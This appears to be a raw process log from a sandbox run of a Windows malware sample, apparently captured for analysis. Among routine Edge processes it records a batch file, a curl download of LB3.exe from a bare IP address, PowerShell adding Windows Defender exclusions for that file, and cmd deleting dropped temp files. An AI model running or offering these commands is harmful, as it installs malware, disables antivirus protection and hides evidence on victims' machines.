"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:14
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\1336.tmp >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:14
C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe
"C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8BEF.tmp\8BF0.tmp\8BF1.bat C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\Downloads\LB3.exe" "http://45.86.155.76/LB3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath ''C:\Users\Admin\Downloads''; Add-MpPreference -ExclusionProcess ''C:\Users\Admin\Downloads\LB3.exe'' -ErrorAction Stop' -Verb RunAs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads'; Add-MpPreference -ExclusionProcess 'C:\Users\Admin\Downloads\LB3.exe' -ErrorAction Stop
C:\Users\Admin\Downloads\LB3.exe
"C:\Users\Admin\Downloads\LB3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5908,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14
C:\ProgramData\BDCE.tmp
"C:\ProgramData\BDCE.tmp"
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{EA650E29-E080-4423-81F8-BE15EB4ED4C8}.xps" 133893832225680000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\BDCE.tmp >> NUL
Network
Files